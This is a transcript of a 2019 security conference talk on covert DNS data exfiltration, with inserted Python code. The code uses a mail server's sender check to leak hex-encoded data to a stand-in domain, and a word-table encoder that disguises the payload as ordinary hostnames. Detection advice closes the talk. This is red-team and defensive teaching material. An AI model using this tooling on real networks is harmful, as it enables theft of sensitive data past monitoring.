GF - Low & Slow - Techniques for DNS Data Exfiltration - Dimitri Fousekis

Name: GF - Low & Slow - Techniques for DNS Data Exfiltration - Dimitri Fousekis
Uploaded: 2019-10-19
Duration: 26 min 37 s
Description: GF - Low & Slow - Techniques for DNS Data Exfiltration - Dimitri Fousekis Ground Floor BSidesLV 2019 - Tuscany Hotel - Aug 07, 2019

Mentioned in this talk

Tools used

BIND Git

Protocols

DNS SMTP

Languages

Python

About this talk

GF - Low & Slow - Techniques for DNS Data Exfiltration - Dimitri Fousekis Ground Floor BSidesLV 2019 - Tuscany Hotel - Aug 07, 2019

Transcript [en]

Good morning, and welcome back to Ground Floor, the third series of talks on various exploitation techniques this morning. It's been pretty fun, as always. A few announcements before we begin: live streaming is going on all day in this room, so please turn cell phones off, and if you have questions, if you wouldn't mind asking them at the microphone so the Internet can pick them up as well. We'd like to thank our sponsors, especially our Inner Circle sponsors, Critical Stack and Valimail, as well as Stellar sponsors BlackBerry Cylance and Robin met. It's their support, as well as all of your participation, that makes this thing possible. So please welcome Dimitri Fousekis.

[Applause] Thanks. Okay, so we're going to be looking at low-and-slow techniques for DNS exfiltration. There are two things we're going to be looking at this afternoon about how to exfiltrate data from within an environment through DNS. The main angle of the talk is, for example, if you're in an assessment, or you're trying to assess the security of a company or its ability to detect exfiltration through DNS, what are the other means you can use? Or, if there's some kind of system that's catching you out all the time, what other options do you have to try and get data out of the company? So there are two sides to it. You can obviously look at it from an offensive

point of view, to see how you can test how the systems work. From a defensive point of view, you can figure out ways to try and combat what will be done, if it's not already being handled. Just briefly: we're not covering DNS tunneling of data in real time, in and out, right? So this is not covering how you can get free Wi-Fi, okay? I think everyone knows that by now. What we're more interested in is getting data out of an environment that is pretty well secured or pretty well locked down, where you just don't have any other means of getting information out there, and you've got the time to get that information out

there. So, kind of what malware does, for example, if it's got time: low and slow, as the talk's title has it, get the data out there and try and exfiltrate what can be done, and of course find ways to get around detection. So currently, if we look at ways that data exfiltration can take place through DNS, this is the most common one, which is your DNS tunnels, as I mentioned before. There are many tools out there; if you just search for them, you'll find them. They tend to be easily picked up by most things out there these days that are looking for that kind of attack and that kind of exfiltration of data. Other ways

of doing it, of course: if you've got binary data, you could Base64 that, use it in subdomains, and then pick them up on the other side as the DNS queries are being performed and convert them back into the data that you want. And then TXT records, also very much a well-known attack as well. So what systems know, and by systems I mean anything out there from a product point of view that's trying to prevent DNS exfiltration, what they're doing pretty well is looking, for example, for abnormally long requests. Okay, so if they see a DNS request that looks like the first line there, well, then you know there's something wrong. A large

number of DNS requests from a single host. Okay, so you've got a desktop in the environment, and it's pushed 200,000-plus DNS queries in the last few minutes: you know there's something wrong there. It shouldn't be doing that; it's a user's workstation, no matter how much they're browsing and working on it. Another method commonly used as well is requests without dictionary words. So basically, anything that statistically doesn't sound like it would form part of a DNS query, because it's not common language to us, right? It doesn't sound like it's a web server, it doesn't sound like it's a name, the entropy is quite high, the characters appear random. Of course they

aren't, but that's what they appear to be when they're being analyzed. So that kind of stuff is also being looked at and detected. And then the other one that's also common, and I've been seeing it more often, is systems capable of checking whether a DNS request was actually followed up by a connection to the IP that came back. Obviously that requires a tie-in from various other systems and logs to correlate the fact that a DNS query was performed: did I actually do something with that, or have I looked up 10,000 A records or TXT records and then not actually done anything after that? So we want to find ways to try and get

around some of these, because they're pretty good at identifying whether we're trying to exfiltrate data out of the company, and we're going to have a look at two ways to try and accomplish that in this talk. So the first one is abusing trusted services within the environment. The angle we're coming from for this one is that generally, what we found is that when looking for suspicious DNS information, sorry, DNS exfiltration, we tend to look at PCs that are doing too many DNS requests, or strange ones. We tend to look at phones, bring-your-own devices, a printer, or something like that. Something like an SMTP server, for example, though, wouldn't raise that much suspicion, because

its job is to do DNS lookups, right? So if you're in an environment and you come across an SMTP server, there's a very good chance that either no one's looking at what DNS queries it's doing, or it's on a whitelist of some kind when it comes to systems checking for DNS exfiltration. So how can we use it to exfiltrate data out of the environment? Now, we're not saying send mail through the SMTP server, because that's not really exfiltration, and you're going to show up in the log file a mile away anyway. What we want to do is get this SMTP server to send data out through DNS queries for us and stop

there, without actually doing anything further. And what's nice about SMTP servers, at least some of them, is that they verify a sender address when they're about to send or receive a message. So if you connect to the SMTP server port, you identify yourself, and then you say MAIL FROM (if you look at the third box there), very common mail servers like Exim, Sendmail, or the Oracle communications server, for example, when they see that, will actually try and look up that domain to figure out whether it's valid or not, as part of the verification. So what's happening is that, from within the environment, you are now sending the data you want

to exfiltrate to the SMTP server as an email address, and then you stop there. That server went and looked up the DNS address because it thought, well, I need to do that as part of my verification, and in doing so it connected outside, sent the query, and sent out the data that you wanted. So you could exfiltrate like that. And although you're going to show up in a log file, you generally will show up as connections or attempts to send mail that just never ended; they timed out, basically. Because the key is obviously not to finish the SMTP transaction: you're sending just the MAIL FROM and the RCPT TO, and then you can cut the

connection from there, because the SMTP server will already try and look up that domain and send the data out. So some servers that we found work by default for this, without needing specific customization: Exim, Sendmail, Postfix, and the Oracle communications server. So if they're running in the environment and you want to get data out through DNS exfiltration, you can use this technique. We are going to put a tool up for it, but it's generally something you could develop on your own too. It's not difficult, because what you're doing is combining the old technique of taking the data, Base64 or any kind of method that you want, and we'll see in

the next technique how to improve on that, but you're taking that, you're creating these email addresses, and asking the server to send mail for them. It goes and looks them up, and out all those requests go for you, sending your data out of the environment without actually sending any mail through it. We found that by default Exchange didn't want to behave like this, so you might want to, you know, if you have time, play around with it and check why. I'm guessing it's because by default it's not set to verify the sender of the mail. So if it's being used as a relay, it will get to the point

where it'll block itself from being used as a relay, but before that it didn't try and actually verify the sender domain. The other ones, of course, are doing that out of the box. Issues with this technique: there aren't many, because we have tried it in a few places and we weren't picked up by common tools that were detecting these attacks, primarily because, as I mentioned, quite a few administrators will whitelist SMTP servers from those checks, because they're just doing so much work with DNS already. You're going to show up in log files: if there's a tool performing that kind of analysis, or someone knows what to look for, you are going to show up as a

system connecting, performing almost half of a correct transmission of email, and then disappearing again. So if someone's looking at the log files for that, they will see it. And then, of course, there's the other possibility: the verify-sender option may be turned off, in which case this attack's not going to work, because the mail server is not going to try and verify that domain when you connect to it. So, for example, how could we automate this? Well, say we've got, excuse me, sample credit card data, and we're using DNS via this SMTP server. I'm going to show you a demonstration of this. I'm

hoping that the Internet is going to play along for it, but as we know, it could go either way. So what I've got in the first window here is a server on the Internet listening for DNS queries. Very, very simple. That's obviously one of the major things you need when exfiltrating data over DNS: a DNS server you can control on the other side. So let me get that command going quickly.

Okay, so in the bottom window there's a little Python script, and its job is basically to connect to the SMTP server. I'm using an example there of a credit card number; it's invalid, obviously. What we're going to do is convert that (this is very easy, a very simple attack) into a hex value. Then we're going to connect to the SMTP server and say, this is a MAIL FROM. For the DNS exfiltration, we're going to have that hex value be part of the domain that we're using, and that's all we're going to do, and then disconnect. What's going to happen is Sendmail is going to try and

verify that domain and, inadvertently, also send this data out to the other side. So hopefully, if everything plays along, we should be able to rebuild it externally. So let's see what happens. Directory...
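The sender side of the demo described above can be sketched roughly as follows. This is a minimal illustration under stated assumptions, not the speaker's actual script: the function names, the HELO name, the host `mail.internal.example`, and the domain `exfil.example` are all placeholders, and it only has an effect if the target mail server verifies the sender domain on MAIL FROM.

```python
import smtplib

MAX_LABEL = 63  # a single DNS label may be at most 63 bytes long


def build_sender(data: bytes, domain: str, user: str = "bob") -> str:
    """Hex-encode `data` and use it as a subdomain label of `domain`."""
    label = data.hex()
    if len(label) > MAX_LABEL:
        raise ValueError("payload too long for one DNS label; split it first")
    return f"{user}@{label}.{domain}"


def send_mail_from(smtp_host: str, sender: str, port: int = 25) -> int:
    """Say HELO and MAIL FROM, then drop the connection without sending mail."""
    smtp = smtplib.SMTP(smtp_host, port, timeout=10)
    try:
        smtp.helo("workstation.example")  # placeholder client name
        code, _ = smtp.mail(sender)       # the server may now resolve the sender domain
        return code
    finally:
        smtp.close()                      # cut the session; no DATA is ever sent


if __name__ == "__main__":
    sender = build_sender(b"4111111111111111", "exfil.example")
    print(sender)
    # Hypothetical internal relay; uncomment to actually connect:
    # send_mail_from("mail.internal.example", sender)
```

A 16-digit number hex-encodes to 32 characters, so it fits in one label; anything longer than 31 bytes would have to be split across several MAIL FROM attempts.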

Okay, let's try that again. [Music] No. So that's what happens when you don't run your demos from the directory you were testing them in.

[Music]

Yeah, that usually works.

Okay, so very simply, what it's done is it's just Base64'd the credit card number, and we've registered a test domain called greenquality.ml, and that's what our BIND server on the other side is listening for. So we want to tell Sendmail that it's going to receive email from bob at that entire domain at the bottom there. So hopefully, if all goes according to plan... okay, so there. You see the MAIL FROM command sends it as that, and as you can see, Sendmail immediately went and queried our DNS server for the actual sender to verify it, and then we got that and converted it back into normal data again.
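The receiving side can be approximated without BIND. The sketch below is an assumption-laden stand-in for the server in the demo: it reads raw DNS queries from a UDP socket, pulls out the queried name, and decodes the label in front of a placeholder domain (`exfil.example`). It assumes the hex encoding described for the script; a Base64 payload would need a different decoder. It also never answers, so a real resolver would retry and eventually give up.

```python
import socket


def parse_qname(packet: bytes) -> str:
    """Extract the queried name from a raw DNS query packet."""
    labels = []
    pos = 12  # the question section starts after the fixed 12-byte header
    while True:
        length = packet[pos]
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointer not expected in a query name")
        pos += 1
        labels.append(packet[pos:pos + length].decode("ascii"))
        pos += length
    return ".".join(labels)


def decode_payload(qname: str, domain: str) -> bytes:
    """Hex-decode whatever sits in front of `domain` in the queried name."""
    qname = qname.rstrip(".").lower()
    suffix = "." + domain.lower()
    if not qname.endswith(suffix):
        raise ValueError("query is not for our domain")
    return bytes.fromhex(qname[: -len(suffix)].replace(".", ""))


def listen(domain: str, host: str = "0.0.0.0", port: int = 53) -> None:
    """Print the decoded payload of every matching query (binding port 53 needs privileges)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((host, port))
    while True:
        packet, addr = sock.recvfrom(512)
        try:
            print(addr[0], decode_payload(parse_qname(packet), domain))
        except (ValueError, IndexError):
            continue  # ignore unrelated or malformed queries
```

Calling `listen("exfil.example")` on a host that is authoritative for the placeholder domain would print each decoded payload together with the address of the resolver that asked for it.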

Obviously, things could still stop this, right? If there's something sitting on the other side of the SMTP server doing, as I mentioned in the beginning, statistical checks on whether your DNS names make sense or not, yes, it would still pick this up. But generally, what we found is that SMTP servers are quite trusted: you can reach them internally, they can connect out quite easily, and no one seems to be watching what they're doing. So it's a good avenue. Okay, so then the second technique we're going to look at is to try and get past the other two checks that are out there: requests without dictionary words, and also

abnormally long requests. So how do we get around these two things? If you look at the table below, it's quite obvious which one of those is trying to exfiltrate data, if you're looking through log files or analyzing them, whereas on the left it looks more like the general DNS queries that would be coming to your DNS server. So what we set out to do is create a framework of sorts that allows us to take the data that we want to exfiltrate through DNS, convert it into DNS queries that look like real-world DNS queries, and then push those out to our custom DNS server,

because what will happen then is that, statistically, we're still passing those checks: they could be English words that exist in a dictionary, they look like common system names, so we can push data out like that. Now, the key thing here is that this is where the slow in low and slow comes in, because this is going to take a while: obviously you haven't got much data to work with to send out in each of the queries, and as soon as you go too long, you're passing the threshold past which, statistically, it's no longer an English word, or it's too long and the entropy is too high. So how do we get around this? What we want to do is, coming back to

the same data that we had, again this credit card number, we take a table, and the framework I mentioned has a tool to do this. We take a list of words, common DNS words. You can find them anywhere: Alexa lists, top lists from search engines, custom DNS lists, anything you want, obviously things that make sense. And we create a hex-to-common-language table with them. So what we want to do is take our data when it's in hex format and be able to get valid English words, or common DNS names, out of it, so that we can send those out and pick them up on the other side. What we

do then is convert the data to hex values and then dump DNS names to use. So once the tool has finished doing that, our credit card number, for example, will result in the following DNS lookups, which the system can use to exfiltrate that credit card number to the other side. And basically what we've done (it's very simple in its design, and you're welcome to make it more complicated; I'm sure there are many better ways of doing it) is we've taken that whole credit card number, so from CC until the 17, the CVV or the check number, turned it into hex, and in our table we're saying that for every single

possible two-character hex combination, give us an English word that is a common DNS name for it, right? The system does that: it looks up in the table what those characters are, converts them to words, and then builds the actual name to send to the other side. So, for example, welcome4.mydomain.co.za: that's the one that actually represents those two characters, CC. So on the other end, when the tool runs, it loads the same dictionary and the same table, and as these queries come in it's now piecing it together and saying, okay, I got welcome4, go look that up in the table, and convert that back from the hex into text again.
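The hex-to-common-language table can be illustrated with a short sketch. It is not the framework from the talk: the function names are invented for illustration, `exfil.example` is a placeholder domain, and the demo word list is synthesized from a handful of hostname-like prefixes only so the example is self-contained. A real run would load a list of genuinely common subdomains, as the talk suggests.

```python
def demo_wordlist():
    """Stand-in for a real list of common subdomains: 16 prefixes x 16 numbers = 256 names."""
    prefixes = ["www", "mail", "ftp", "vpn", "api", "cdn", "dev", "shop",
                "blog", "news", "img", "app", "web", "ns", "smtp", "portal"]
    return [f"{p}{n}" for p in prefixes for n in range(1, 17)]


def build_table(words):
    """Map every byte value (two hex characters) to one distinct word, and back."""
    unique = sorted(set(w.lower() for w in words))
    if len(unique) < 256:
        raise ValueError("need at least 256 distinct words")
    encode = {value: unique[value] for value in range(256)}
    decode = {word: value for value, word in encode.items()}
    return encode, decode


def to_queries(data: bytes, encode, domain: str):
    """One innocuous-looking lookup per byte of data."""
    return [f"{encode[b]}.{domain}" for b in data]


def from_queries(queries, decode, domain: str) -> bytes:
    """Rebuild the data from the names seen by the receiving DNS server."""
    suffix = "." + domain
    return bytes(decode[q.lower()[: -len(suffix)]] for q in queries)


if __name__ == "__main__":
    enc, dec = build_table(demo_wordlist())
    names = to_queries(b"4111111111111111", enc, "exfil.example")
    print(names)
    print(from_queries(names, dec, "exfil.example"))
```

Both ends must build the table from the same word list in the same order. Note that repeated bytes produce identical names, so the receiver only sees every byte if each lookup actually leaves the network.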

And so on and so forth. One caveat you will notice is that sometimes there are duplicates, because we're using a table, so the same hex value is going to have the same name, and if it appears again you're going to have the same query go out. So what you need to make sure of, and hope for, is that the TTL on your DNS records is very, very low, as low as you can possibly go, so they expire pretty quickly. Otherwise the resolver is not going to perform a lookup again, and what's going to happen is the receiver on the other end is going to be out of sync, because it's not receiving the correct information on that side. The other thing

to look out for as well, of course, is to try and mix the domains. We're building that into this framework as well, so you can register a pool of domains that your BIND server will listen for on the other side, and it can just randomly change those, or it can use them for various things. So, for example, welcome4.xyz.com: if xyz.com is being used and your BIND server picks that up, that means it's the start of binary data. Then you can send the mydomain domain or any other domain, and end it with something else, like xyz2.com, and that'll mark the end of the binary data. So that way you can build some kind of

error checking in, so that when you're rebuilding the data on the other side, the system can make sense of what exactly it is receiving. Again, this is going to take a while, depending on how fast you can push data out. If you're doing this directly against the DNS server, yes, you can do it quite fast. If you're doing it through the SMTP attack that we saw in the beginning, that's going to take a bit longer. You can generally fire off the requests quite fast against the SMTP server, but again, you want to try and stay under the radar, below where detection tools are going to start figuring out that you're sending too many mails

and too much data out of the company. The other thing to keep in mind as well is, obviously, the dictionary you use. The system just takes any word list as a dictionary, but it's got to be stuff that makes sense, right? Because tools that are statistically analyzing DNS queries to look for DNS exfiltration are quite good, and with machine learning and things like that, they can have a pretty good understanding not just of what's English and what's not, but of what's commonly used on the web and what is not. So if you plugged a medical dictionary into the system, you might get detected, because those kinds of subdomains don't really appear everywhere

on the net. So pick stuff that fits. What I used here: I just looked on the Internet for a list of common subdomains used in hosting environments, because I figured they would be the most common, and then you can play around with that and get lists and things that work for you. As mentioned, we will put this framework up on GitHub soon; if you follow my Twitter account, you'll find the tools there. We're trying to build the framework up a piece at a time, so there'll be a tool to do SMTP exfiltration, there'll be a tool for common-language DNS exfiltration, or CLDE as we call it, and of course we

want everyone to build on that and try and make it better. From a defense point of view, again, as I mentioned, there are various ways to pick up that this is happening in your environment. From an SMTP server perspective, you should probably be looking at what the logs are showing, the actual mail engine's logs, so that you can map DNS queries against what the server was doing. And if you're paying enough attention, or if the tools analyzing that data are adequate, you'll see that these DNS queries were coming from only half-sent messages. But again, it depends on the logging as well. We've seen some environments where, to

avoid the log files growing too big, if an SMTP message is not fully transmitted correctly and the session just stops, the server won't log that at all, in which case it's a field day for this attack, because you're never going to show up in a log file, because you didn't finish the SMTP session. Another thing we want to build into it, obviously, is the ability to do a TCP connect, so keep that in mind as well. I think there's one tool, I can't remember its name but I came across it, that is using machine learning to look for various attacks. One of them is DNS exfiltration, and what it's doing is looking at DNS queries coming

out of the environment versus connections going through the firewall or firewalls. So that kind of thing is something to look out for if you want to try and test whether you're being nabbed. Again, some of this is not really proactive, it's reactive: you can send the data out, and it's only next week, when millions and millions of records have been processed, that somebody comes to you and says, okay, something was up here that shouldn't be. But again, it is possible to do that. Okay, so I only had 27 minutes for this talk, so I'm not sure we're going to have enough time for questions, but maybe one or two very quick ones, if

anyone has any. Okay, we'll start there, we'll start at the mic. [Audience] Yeah, okay, the talk is awesome, I really like the tool and stuff. Can't you use the SMTP server when you do the HELO? Doesn't it look up what domain you're from? Because if you use that, then the few places that do log SMTP half-sends surely won't log that, because you haven't even started sending; you've just said HELO. [Speaker] Yeah, so that would work too. The reason I didn't put it in the talk is because it's not on by default in most, I think in all of those servers, if I'm not mistaken. So you need to

turn on its ability to do that. If it is on, yeah, that's great, because right at the beginning you can send the DNS query, the DNS exfiltration, on the HELO. [Audience] Oh, cool, thanks. [Speaker] Was there someone else?

[Audience] I was just curious about the lookup table of words, stuff like that. Do you have the ability to have different lookup tables every 20 characters, or every 5 characters, so that you get a much more random distribution of domain names? [Speaker] Yeah, you can. You can extend it, you can make it as long or as short as you want, you can randomly select within the file. It really depends what you're plugging into it, so you can create exactly how you want that file to look when the system uses it to create its table. [Audience] I guess my thought was, where the name was welcome, if,

say, it was after 20 characters, could it be a different DNS name altogether? [Speaker] Yes. Oh, I see. Okay, so you mean the actual lookup table changes? [Audience] I mean the subdomain. [Speaker] You mean the domain it's doing the exfiltration to on the other end? Yeah, we don't currently have that built in, but we could look at doing that. So it could do that; that's also a good idea as well. Okay, so that's the end of our time, unfortunately, but my

[Applause]
